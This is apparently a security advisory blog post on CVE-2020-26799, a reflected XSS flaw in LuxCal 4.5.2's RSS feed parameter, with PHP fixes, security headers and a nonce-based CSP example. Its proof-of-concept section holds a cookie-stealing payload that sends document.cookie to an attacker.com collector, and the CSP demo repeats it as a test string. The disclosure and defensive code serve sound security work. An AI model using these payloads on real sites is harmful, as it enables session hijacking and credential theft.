Reflected Cross-Site Scripting (XSS) in LuxCal 4.5.2 - CVE-2020-26799
Overview #
A reflected cross-site scripting (XSS) vulnerability was discovered in LuxCal 4.5.2. An unauthenticated attacker who can get a victim to open a crafted link can execute arbitrary JavaScript in the victim's browser with the origin of the LuxCal site, read data the victim's session can reach, and perform actions as the victim.
Technical Details #
CVE ID: CVE-2020-26799
CVSS Score: 6.1 (Medium)
Affected Versions: LuxCal v4.5.2
Latest Version: LuxCal v4.7.x (released 2018)
Vulnerability Type: Reflected Cross-Site Scripting (XSS)
Affected Component #
- File: index.php
- Parameter: RSS feed link parameter (rssfeed in the proof of concept below)
- Attack Vector: Network (Unauthenticated)
Vulnerability Description #
The reflected XSS vulnerability exists in the index.php file, where the value of the RSS feed link parameter is reflected into the HTML response without being encoded for the context it lands in. Because the parameter is taken straight from the request URL, the attacker does not need an account: any user who opens a crafted link has the injected JavaScript executed in their own browser.
Impact #
Once the injected script runs, it executes with the origin of the LuxCal site and allows attackers to perform:
- Information Disclosure - Read page content and any data the victim's session can reach
- Cookie Stealing - Hijack sessions by reading cookies that are not flagged HttpOnly
- Social Engineering Attacks - Display fake login forms or other malicious content inside the trusted page
- Request Forgery - Issue authenticated requests to the application on behalf of the victim (the script is same-origin, so CSRF tokens do not help)
- Credential Harvesting - Capture credentials entered into injected forms
- Malware Distribution - Redirect users to attacker-controlled websites
Attack Scenarios #
Scenario 1: Session Hijacking An attacker can craft a malicious URL whose script reads the victim's session cookies (when they are not flagged HttpOnly) and sends them to an attacker-controlled server.
Scenario 2: Credential Theft The attacker can inject JavaScript that displays a fake login form, capturing credentials when users attempt to log in.
Scenario 3: Defacement Malicious scripts can modify the page content to display unauthorized information or redirect users to malicious sites.
Proof of Concept #
A demonstration of this vulnerability exploitation is available in the following video:
Video PoC: https://youtu.be/npw9jcQ1h1U
Basic XSS Payload Example #
<!-- Malicious URL structure -->
http://target.com/index.php?rssfeed=<script>alert('XSS')</script>
<!-- Advanced payload for cookie stealing -->
http://target.com/index.php?rssfeed=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
The payloads are shown unencoded for readability; when sending them, percent-encode the parameter value so that characters such as <, >, quotes and # reach the server intact. The cookie-stealing payload only works against cookies that are not flagged HttpOnly: with HttpOnly set, document.cookie does not expose the session cookie, although the injected script can still issue authenticated requests from the victim's browser.
Attack Vectors #
- Network-based: Remote exploitation via crafted URLs
- Unauthenticated: No authentication required to exploit
- Social Engineering: Victims can be tricked into clicking malicious links
- Email/Messaging: Malicious URLs can be distributed via email or messaging platforms
Affected Organizations #
During penetration testing engagements, this vulnerable version of LuxCal was found to still be in use by various organizations, including enterprise environments, as late as October 2020. This highlights the importance of keeping software updated to the latest versions.
Mitigation #
Immediate Actions #
- Update to Latest Version: Upgrade to LuxCal v4.7.x or later; this is the actual fix
- Input Validation: Validate the RSS feed link parameter against what a feed link should be (an absolute http or https URL) and reject anything else
- Output Encoding: Encode every reflected value for the context it lands in (HTML body, attribute, URL) before output
- Content Security Policy: Deploy CSP as defense in depth; it limits what an injected script can do but does not replace the fix
Recommended Fixes #
// Encode the value for the HTML context in which it is reflected.
// ENT_QUOTES also escapes single quotes, which matters inside attributes.
$rssfeed = htmlspecialchars($_GET['rssfeed'] ?? '', ENT_QUOTES, 'UTF-8');
Encoding alone is not sufficient when the value is placed in an href attribute: a javascript: URL passes through htmlspecialchars() unchanged, so a feed link must additionally be validated as an http or https URL. filter_var() with FILTER_SANITIZE_STRING is not a substitute; it strips tags rather than encoding for a context, and it is deprecated as of PHP 8.1.
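The following is an added example written for this post, not LuxCal's own code: the vulnerable pattern described above beside a hardened version that validates the feed link as an http(s) URL and then encodes it for the attribute context. The parameter name rssfeed, the <a href> rendering context and the sample inputs are assumptions; LuxCal's real template is not reproduced here.

```php
<?php
// Added example (not LuxCal's code). In the application the input would be
// $_GET['rssfeed'] ?? ''; here it comes from the constructed cases below.
declare(strict_types=1);

// Vulnerable pattern: the query value is concatenated straight into markup.
function renderFeedLinkVulnerable(string $feed): string
{
    return '<a href="' . $feed . '">RSS feed</a>';
}

// Reject-by-default validation: only absolute http/https URLs with a host
// are accepted, which keeps javascript:, data: and bare markup out of href.
// An allowlist of known feed hosts would be stricter still if the
// application only ever links to a fixed set of feeds.
function safeFeedUrl(string $feed): ?string
{
    $feed = trim($feed);
    if ($feed === '' || strlen($feed) > 2048) {
        return null;
    }
    $parts = parse_url($feed);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $feed;
}

// Hardened rendering: validate first, then encode for the attribute context.
// The encoding step is still required after validation, because a valid URL
// may contain quotes that would otherwise terminate the attribute.
function renderFeedLinkHardened(string $feed): string
{
    $url = safeFeedUrl($feed);
    if ($url === null) {
        // Nothing attacker-controlled reaches the page on rejection.
        return '<span>Invalid feed URL</span>';
    }
    $enc = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<a href="' . $enc . '">RSS feed</a>';
}

// Constructed inputs: one legitimate feed and three attack strings.
$cases = [
    'https://example.org/feed.xml',
    '"><script>alert(1)</script>',
    'javascript:alert(document.cookie)',
    "https://example.org/x\" onmouseover=\"alert(1)",
];

foreach ($cases as $input) {
    echo "input:      {$input}\n";
    echo "vulnerable: " . renderFeedLinkVulnerable($input) . "\n";
    echo "hardened:   " . renderFeedLinkHardened($input) . "\n\n";
}
```

Run it with php on the command line. The second and third inputs are rejected outright by safeFeedUrl(); the fourth parses as a valid https URL and is accepted, which is exactly why the encoding step after validation is not optional: in the hardened output its quotes are rendered as &quot; and the onmouseover handler never becomes an attribute, while the vulnerable output contains the raw payload.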
Security Headers #
# Defense in depth for an Apache front end; none of these replace fixing the reflection
Header always set X-Content-Type-Options nosniff
Header always set X-Frame-Options DENY
# X-XSS-Protection is obsolete: Chromium removed its XSS auditor and Firefox never had one. Set it to 0 or omit it.
Header always set X-XSS-Protection "0"
# Blocks inline <script> and inline event handlers, including any the application itself relies on; test before deploying
Header always set Content-Security-Policy "default-src 'self'"
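A policy of default-src 'self' blocks every inline script, including the application's own. The usual way to keep legitimate inline scripts working while still blocking an injected <script> is a per-request nonce, which has to be generated in PHP rather than in a static Apache directive. The block below is an added example for this post, not LuxCal's code; the initCalendar() call, the attacker.com URL and the scriptAllowed() helper that imitates the browser's nonce check are illustrative assumptions.

```php
<?php
// Added example (not LuxCal's code): nonce-based CSP. An injected <script>
// cannot know the nonce, so the browser refuses to run it, while the page's
// own inline script carries the nonce and runs.
declare(strict_types=1);

// One nonce per request: 128 bits of randomness, base64-encoded as CSP expects.
function cspNonce(): string
{
    static $nonce = null;
    if ($nonce === null) {
        $nonce = base64_encode(random_bytes(16));
    }
    return $nonce;
}

// object-src 'none' and base-uri 'self' close the plugin and <base>-tag
// bypasses; frame-ancestors 'none' is the CSP equivalent of X-Frame-Options DENY.
function cspHeaderValue(string $nonce): string
{
    return "default-src 'self'; script-src 'self' 'nonce-{$nonce}'; "
         . "object-src 'none'; base-uri 'self'; frame-ancestors 'none'";
}

// Illustrative stand-in for the browser's decision: a script tag is executed
// only if it carries the nonce named in the policy. Assumption for this demo,
// not a replacement for testing in a real browser.
function scriptAllowed(string $tag, string $nonce): bool
{
    return preg_match('/\bnonce="' . preg_quote($nonce, '/') . '"/', $tag) === 1;
}

$nonce = cspNonce();
if (PHP_SAPI !== 'cli') {
    // Must be sent before any output; in a web request this goes at the top of index.php.
    header('Content-Security-Policy: ' . cspHeaderValue($nonce));
}

// The page's own inline script (initCalendar() is an assumed name) versus the
// cookie-stealing payload from the proof of concept above.
$legit    = '<script nonce="' . htmlspecialchars($nonce, ENT_QUOTES, 'UTF-8') . '">initCalendar();</script>';
$injected = '<script>document.location="http://attacker.com/steal.php?cookie="+document.cookie</script>';

echo cspHeaderValue($nonce), "\n";
echo "page script allowed:     ", scriptAllowed($legit, $nonce) ? 'yes' : 'no', "\n";
echo "injected script allowed: ", scriptAllowed($injected, $nonce) ? 'yes' : 'no', "\n";
```

The nonce must be fresh on every response and never reused, otherwise an attacker who has seen one page load can include it in the payload. Inline event handlers (onclick=, onmouseover=) cannot carry a nonce and stay blocked, so an application that depends on them needs those handlers moved into a nonced or same-origin script before this policy can be enforced.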
Timeline #
- Discovery: October 2020 (During penetration testing engagement)
- CVE Assignment: CVE-2020-26799 assigned
- Vendor Status: LuxCal v4.7.x already available (released 2018)
- Public Disclosure: July 20, 2025
Vendor Information #
Vendor: LuxSoft
Product: LuxCal Calendar Software
Vendor Website: https://www.luxsoft.eu/index.php?pge=dload
Note: The vendor had already released LuxCal v4.7.x in 2018, which addresses this vulnerability. Organizations using older versions should upgrade immediately.
Credit #
This vulnerability was discovered during a penetration testing engagement and responsibly disclosed. The discovery highlights the importance of regular security assessments and keeping software updated to the latest versions.
This post is part of our ongoing security research into web applications. For more security insights, visit https://suryadina.com.